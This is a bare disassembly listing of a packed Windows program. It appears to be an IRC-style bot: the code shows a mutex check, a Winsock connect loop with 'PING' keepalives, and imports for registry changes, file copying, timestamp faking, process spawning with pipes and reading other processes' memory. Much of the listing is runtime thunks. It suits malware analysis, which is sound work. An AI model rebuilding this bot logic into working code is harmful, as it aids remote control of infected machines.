push 0
call dword_4170F8 ; CreateMutexA
mov [ebp-12F0h], eax
cmp dword ptr [ebp-12F0h], 0
jz short loc_4168BA
call dword_417064 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4168BA
jmp short loc_4168BC
; ---------------------------------------------------------------------------
loc_4168BA: ; CODE XREF: .packed:004168AC�j
; .packed:004168B6�j
jmp short loc_416868
; ---------------------------------------------------------------------------
loc_4168BC: ; CODE XREF: .packed:004168B8�j
call sub_403BD3
call sub_405FA3
call sub_40938F
call sub_412FC6
call sub_4102AE
call sub_40E979
push 10h
push offset dword_41DAB8
call sub_41055F
pop ecx
pop ecx
push 10h
push offset dword_41DAB8
call sub_40ECEB
pop ecx
pop ecx
push 10h
push offset dword_41DAB8
call sub_40ED6E
pop ecx
pop ecx
call sub_410422
mov dword_41ECC0, eax
call sub_410422
mov dword_41ECC4, eax
call sub_410422
mov dword_41ECC8, eax
call sub_410422
mov dword_41ECCC, eax
push 104h
lea eax, [ebp-1120h]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
test eax, eax
jnz short loc_416961
push offset byte_41DEC0
push offset dword_41EBBC
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp loc_4169E1
; ---------------------------------------------------------------------------
loc_416961: ; CODE XREF: .packed:00416949�j
lea eax, [ebp-1120h]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp-12F4h], eax
jmp short loc_416983
; ---------------------------------------------------------------------------
loc_416976: ; CODE XREF: .packed:loc_4169DF�j
mov eax, [ebp-12F4h]
dec eax
mov [ebp-12F4h], eax
loc_416983: ; CODE XREF: .packed:00416974�j
cmp dword ptr [ebp-12F4h], 0
jnz short loc_41699F
push offset byte_41DEC0
push offset dword_41EBBC
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_41699F: ; CODE XREF: .packed:0041698A�j
mov eax, [ebp-12F4h]
movsx eax, byte ptr [ebp+eax-1121h]
cmp eax, 5Ch
jnz short loc_4169DF
mov eax, [ebp-12F4h]
lea eax, [ebp+eax-1120h]
push eax
push offset dword_41EBBC
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41EBBC
push offset dword_41ECD0
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_4169DF: ; CODE XREF: .packed:004169B0�j
jmp short loc_416976
; ---------------------------------------------------------------------------
loc_4169E1: ; CODE XREF: .packed:0041695C�j
; .packed:0041699D�j ...
call sub_406E8E
lea eax, [ebp-12ECh]
push eax
push 202h
call dword_417264 ; WSAStartup
loc_4169F8: ; CODE XREF: .packed:00416A43�j
; .packed:00416AA7�j
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
call sub_409226
and dword ptr [ebp-1124h], 0
and dword ptr [ebp-101Ch], 0
loc_416A19: ; CODE XREF: .packed:00416AE2�j
mov dword ptr [ebp-4], 1
loc_416A20: ; CODE XREF: .packed:loc_416A6F�j
; .packed:00416AC0�j
push 0EA60h
call sub_40CF25
push eax
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_416A71
cmp dword ptr [ebp-101Ch], 19h
jnz short loc_416A45
and dword ptr [ebp-4], 0
jmp short loc_4169F8
; ---------------------------------------------------------------------------
loc_416A45: ; CODE XREF: .packed:00416A3D�j
cmp dword ptr [ebp-101Ch], 14h
jnz short loc_416A62
call sub_410422
push eax
push offset aPing08x ; "PING :%08X"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_416A6F
; ---------------------------------------------------------------------------
loc_416A62: ; CODE XREF: .packed:00416A4C�j
mov eax, [ebp-101Ch]
inc eax
mov [ebp-101Ch], eax
loc_416A6F: ; CODE XREF: .packed:00416A60�j
jmp short loc_416A20
; ---------------------------------------------------------------------------
loc_416A71: ; CODE XREF: .packed:00416A34�j
push 1000h
lea eax, [ebp-1018h]
push eax
call sub_40CF25
push eax
call sub_4053DC
add esp, 0Ch
mov [ebp-1124h], eax
cmp dword ptr [ebp-1124h], 0
jz short loc_416AA3
cmp dword ptr [ebp-1124h], 0FFFFFFFFh
jnz short loc_416AAC
loc_416AA3: ; CODE XREF: .packed:00416A98�j
and dword ptr [ebp-4], 0
jmp loc_4169F8
; ---------------------------------------------------------------------------
loc_416AAC: ; CODE XREF: .packed:00416AA1�j
and dword ptr [ebp-101Ch], 0
lea eax, [ebp-1018h]
push eax
call sub_40E943
pop ecx
jmp loc_416A20
; ---------------------------------------------------------------------------
loc_416AC5: ; DATA XREF: .packed:004172A8�o
push offset aLoop ; "loop"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_416ADB: ; DATA XREF: .packed:004172AC�o
mov esp, [ebp-18h]
and dword ptr [ebp-4], 0
jmp loc_416A19
; ---------------------------------------------------------------------------
push offset aEntry ; "entry"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword_41DEC8, 0
jz short loc_416B1E
push offset dword_41DDE0
push offset dword_41DB3C
call sub_40D4AB
pop ecx
pop ecx
loc_416B1E: ; CODE XREF: .packed:00416B0B�j
call dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B3A proc near ; CODE XREF: sub_401000+3C�p
; sub_4020C2+62�p ...
jmp dword_41712C
sub_416B3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B40 proc near ; CODE XREF: sub_401146+7A�p
; sub_4017AA+E�p ...
jmp dword_4171BC
sub_416B40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B46 proc near ; CODE XREF: sub_401244+85�p
; sub_4017AA+22�p ...
jmp dword_4171B8
sub_416B46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B4C proc near ; CODE XREF: sub_401244+25�p
; sub_401244+4DE�p ...
jmp dword_4171B4
sub_416B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B52 proc near ; CODE XREF: sub_401244+1A�p
; sub_401981+18�p ...
jmp dword_4171B0
sub_416B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B58 proc near ; CODE XREF: sub_4017AA+5A�p
; sub_4024F3+88�p ...
jmp dword_4171AC
sub_416B58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B5E proc near ; CODE XREF: sub_4018AF+9F�p
; sub_4055E5+231�p ...
jmp dword_4171A8
sub_416B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B64 proc near ; CODE XREF: sub_4018AF+3B�p
; sub_4018AF+5D�p ...
jmp dword_4171A4
sub_416B64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B6A proc near ; CODE XREF: sub_401981+145�p
; sub_401981+158�p ...
jmp dword_4171A0
sub_416B6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B70 proc near ; CODE XREF: sub_401D6E+A5�p
; sub_403260+4C�p ...
jmp dword_41719C
sub_416B70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B76 proc near ; CODE XREF: sub_401E38+1AB�p
; sub_4020C2+1A6�p ...
jmp dword_417198
sub_416B76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B7C proc near ; CODE XREF: sub_401E38+179�p
; sub_402698+24C�p ...
jmp dword_417194
sub_416B7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B82 proc near ; CODE XREF: sub_401E38+9D�p
; sub_401E38+262�p ...
jmp dword_417190
sub_416B82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B88 proc near ; CODE XREF: sub_401E38+42�p
; sub_4020C2+159�p ...
jmp dword_41718C
sub_416B88 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B90 proc near ; CODE XREF: sub_4020C2+2C1�p
; sub_41102F+94�p ...
jmp dword_417188
sub_416B90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B96 proc near ; CODE XREF: sub_4020C2+198�p
; sub_4020C2+1BC�p ...
jmp dword_417184
sub_416B96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B9C proc near ; CODE XREF: sub_4024F3+26�p
; sub_4024F3+46�p ...
jmp dword_417180
sub_416B9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA2 proc near ; CODE XREF: sub_402698+160�p
; sub_40CA29+F6�p ...
jmp dword_41717C
sub_416BA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA8 proc near ; CODE XREF: sub_402698+CC�p
; sub_402698+110�p ...
jmp dword_417178
sub_416BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BAE proc near ; CODE XREF: sub_402698+4B�p
; sub_4083AD+3DF�p ...
jmp dword_417174
sub_416BAE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416BC0 proc near ; CODE XREF: sub_403DF3+8�p
; sub_40546E+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_416BE0
loc_416BCC: ; CODE XREF: sub_416BC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_416BCC
loc_416BE0: ; CODE XREF: sub_416BC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_416BC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF0 proc near ; CODE XREF: sub_4041B7+D�p
; sub_4041B7+28�p ...
jmp dword_417170
sub_416BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF6 proc near ; CODE XREF: sub_406041+67�p
jmp dword_41716C
sub_416BF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BFC proc near ; CODE XREF: sub_406E8E+2B3�p
; .packed:00416B26�p
jmp dword_417168
sub_416BFC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C10 proc near ; CODE XREF: sub_40821B+61�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_416C31
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_416C81
; ---------------------------------------------------------------------------
loc_416C31: ; CODE XREF: sub_416C10+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_416C3F: ; CODE XREF: sub_416C10+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416C3F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_416C6A
cmp edx, [esp+4+arg_4]
ja short loc_416C6A
jb short loc_416C72
cmp eax, [esp+4+arg_0]
jbe short loc_416C72
loc_416C6A: ; CODE XREF: sub_416C10+4A�j
; sub_416C10+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_416C72: ; CODE XREF: sub_416C10+52�j
; sub_416C10+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_416C81: ; CODE XREF: sub_416C10+1F�j
pop ebx
retn 10h
sub_416C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C90 proc near ; CODE XREF: sub_40821B+30�p
; sub_40821B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_416CB2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_416CF3
; ---------------------------------------------------------------------------
loc_416CB2: ; CODE XREF: sub_416C90+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_416CC0: ; CODE XREF: sub_416C90+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416CC0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_416CEE
cmp edx, [esp+8+arg_4]
ja short loc_416CEE
jb short loc_416CEF
cmp eax, [esp+8+arg_0]
jbe short loc_416CEF
loc_416CEE: ; CODE XREF: sub_416C90+4E�j
; sub_416C90+54�j
dec esi
loc_416CEF: ; CODE XREF: sub_416C90+56�j
; sub_416C90+5C�j
xor edx, edx
mov eax, esi
loc_416CF3: ; CODE XREF: sub_416C90+20�j
pop esi
pop ebx
retn 10h
sub_416C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CF8 proc near ; CODE XREF: sub_4088FC+1FA�p
; sub_409226+5C�p ...
jmp dword_417164
sub_416CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CFE proc near ; CODE XREF: sub_409226+55�p
; sub_4092A4+55�p ...
jmp dword_417160
sub_416CFE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416D10 proc near ; CODE XREF: sub_409226+42�p
; sub_4092A4+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_416D31
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_416D31: ; CODE XREF: sub_416D10+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_416D4D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_416D4D: ; CODE XREF: sub_416D10+27�j
or eax, eax
jnz short loc_416D69
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_416DAA
; ---------------------------------------------------------------------------
loc_416D69: ; CODE XREF: sub_416D10+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_416D77: ; CODE XREF: sub_416D10+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_416D77
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_416DA5
cmp edx, [esp+0Ch+arg_4]
ja short loc_416DA5
jb short loc_416DA6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_416DA6
loc_416DA5: ; CODE XREF: sub_416D10+85�j
; sub_416D10+8B�j
dec esi
loc_416DA6: ; CODE XREF: sub_416D10+8D�j
; sub_416D10+93�j
xor edx, edx
mov eax, esi
loc_416DAA: ; CODE XREF: sub_416D10+57�j
dec edi
jnz short loc_416DB4
neg edx
neg eax
sbb edx, 0
loc_416DB4: ; CODE XREF: sub_416D10+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_416D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DBA proc near ; DATA XREF: sub_4093B6+A�o
; sub_4094E6+A�o ...
jmp dword_41715C
sub_416DBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC0 proc near ; CODE XREF: sub_409479+41�p
; sub_4095A4+162�p
jmp dword_417158
sub_416DC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC6 proc near ; CODE XREF: sub_4095A4+11B�p
jmp dword_417154
sub_416DC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DCC proc near ; CODE XREF: sub_409CB1+105�p
; sub_409CB1+114�p ...
jmp dword_417150
sub_416DCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD2 proc near ; CODE XREF: sub_409CB1+42�p
; sub_409CB1+88�p
jmp dword_41714C
sub_416DD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD8 proc near ; CODE XREF: sub_409CB1+1A�p
; sub_409DD0+13B�p
jmp dword_417148
sub_416DD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DDE proc near ; CODE XREF: sub_40A2D2+13E�p
; sub_40A9CF+1F6�p ...
jmp dword_417144
sub_416DDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DE4 proc near ; CODE XREF: sub_40A8AD+90�p
jmp dword_417140
sub_416DE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DEA proc near ; CODE XREF: sub_40A9CF+185C�p
jmp dword_41713C
sub_416DEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF0 proc near ; CODE XREF: sub_40D420+47�p
; sub_40D4AB+50�p ...
jmp dword_417138
sub_416DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF6 proc near ; CODE XREF: sub_40EF59+6B�p
; sub_40EF59+C1�p
jmp dword_417134
sub_416DF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DFC proc near ; CODE XREF: sub_40F040+52�p
; sub_40F040+A8�p
jmp dword_417130
sub_416DFC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E02 proc near ; CODE XREF: sub_40F040+1E�p
jmp dword_417128
sub_416E02 endp
; ---------------------------------------------------------------------------
loc_416E08: ; CODE XREF: .packed:00416FE2�j
jmp dword_417124
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E10 proc near ; CODE XREF: sub_414EF4+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_416E10 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E30 proc near ; CODE XREF: sub_4048EF+4E�p
; sub_4048EF+2CF�p ...
jmp dword_4171F8
sub_416E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E40 proc near ; CODE XREF: sub_414EF4+EA�p
; sub_414EF4+1E2�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_416EAF
retn 4
sub_416E40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E4E proc near ; CODE XREF: sub_414EF4+134�p
; sub_414EF4+2D8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_416EA0
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_41DE60
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_416EA0
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_416EA0
lea eax, [ebp+var_4]
push eax
push 0
call dword_4171C8
test eax, eax
jz short loc_416EA0
and [ebp+var_4], 0
loc_416EA0: ; CODE XREF: sub_416E4E+D�j
; sub_416E4E+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_416EAF
leave
retn 0Ch
sub_416E4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EAF proc near ; CODE XREF: sub_416E40+6�p
; sub_416E4E+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416ED3
lea eax, [ebp+var_10]
push offset dword_4173B8
push eax
call sub_416FA2 ; _CxxThrowException
sub_416EAF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416ED3 proc near ; CODE XREF: sub_416EAF+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_4172B4
test eax, eax
mov [esi+8], eax
jz short loc_416EFF
cmp [esp+4+arg_8], 0
jz short loc_416EFF
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416EFF: ; CODE XREF: sub_416ED3+1D�j
; sub_416ED3+24�j
mov eax, esi
pop esi
retn 0Ch
sub_416ED3 endp
; =============== S U B R O U T I N E =======================================
sub_416F05 proc near ; DATA XREF: .packed:off_4172B4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_416F4E
test [esp+4+arg_0], 1
jz short loc_416F1B
push esi
call sub_416DCC
pop ecx
loc_416F1B: ; CODE XREF: sub_416F05+D�j
mov eax, esi
pop esi
retn 4
sub_416F05 endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_4172B4
jz short loc_416F48
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416F48: ; CODE XREF: .packed:00416F40�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_416F4E proc near ; CODE XREF: sub_416F05+3�p
; DATA XREF: .packed:004173BC�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_4172B4
test eax, eax
jz short loc_416F64
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416F64: ; CODE XREF: sub_416F4E+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_416F72
push esi
call dword_4170B0 ; LocalFree
loc_416F72: ; CODE XREF: sub_416F4E+1B�j
pop esi
retn
sub_416F4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F74 proc near ; CODE XREF: sub_401244+120�p
; sub_406E8E+DA�p ...
jmp dword_4171C0
sub_416F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F7A proc near ; CODE XREF: sub_4020C2+113�p
; sub_4038BA+22F�p ...
jmp dword_417114
sub_416F7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F80 proc near ; CODE XREF: sub_402A32+CC�p
; sub_402A32+2B9�p ...
jmp dword_417118
sub_416F80 endp
; =============== S U B R O U T I N E =======================================
sub_416F86 proc near ; DATA XREF: .packed:off_4172BC�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_416FA8
test [esp+4+arg_0], 1
jz short loc_416F9C
push esi
call sub_416DCC
pop ecx
loc_416F9C: ; CODE XREF: sub_416F86+D�j
mov eax, esi
pop esi
retn 4
sub_416F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA2 proc near ; CODE XREF: sub_416EAF+1F�p
jmp dword_41711C
sub_416FA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA8 proc near ; CODE XREF: sub_416F86+3�p
jmp dword_417120
sub_416FA8 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-0A00h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
loc_416FBC: ; DATA XREF: .packed:0041737C�o
lea ecx, [ebp-10h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0DF8h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0E14h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
loc_416FDD: ; DATA XREF: sub_414EF4�o
mov eax, offset dword_417350
jmp loc_416E08
; ---------------------------------------------------------------------------
align 4
dd 6 dup(0)
dword_417000 dd 77DECF4Ah ; resolved to->ADVAPI32.RegEnumValueAdword_417004 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueA ; sub_406C51+96�r
dword_417008 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_406722+184�r ...
dword_41700C dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA ; sub_4083AD+2DD�r ...
dword_417010 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_417014 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_417018 dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameAdword_41701C dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_417020 dd 77DE5244h ; resolved to->ADVAPI32.CryptGenRandom ; sub_4102AE+37�r ...
dword_417024 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_417028 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_406722+2F9�r ...
align 10h
dword_417030 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_40D043+20B�r ...
dword_417034 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_408342+4B�r
dword_417038 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryAdword_41703C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_414EF4+8EE�r
dword_417040 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_417044 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_406B81+95�r ...
dword_417048 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_41704C dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_417050 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_406AE7+15�r ...
dword_417054 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_403BD3+32�r ...
dword_417058 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_403BD3+4D�r ...
dword_41705C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_407148+18B�r ...
dword_417060 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_406E8E+1FE�r
dword_417064 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_409CB1+CF�r ...
dword_417068 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_406D90+D3�r
dword_41706C dd 7C8217EAh ; resolved to->KERNEL32.SearchPathAdword_417070 dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipe ; sub_401981+D7�r
dword_417074 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_401981+111�r
dword_417078 dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameAdword_41707C dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_406E8E+2A5�r
dword_417080 dd 7C85F90Fh ; resolved to->KERNEL32.PeekNamedPipedword_417084 dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcessdword_417088 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_41708C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_40332B+1D0�r ...
dword_417090 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_40332B+1D7�r ...
dword_417094 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_406041+193�r ...
dword_417098 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemory ; sub_406509+91�r
dword_41709C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401244+4F4�r ...
dword_4170A0 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_406643+3B�r
dword_4170A4 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_401244+4C1�r ...
dword_4170A8 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_406E8E+22A�r ...
dword_4170AC dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_401E38+30�r ...
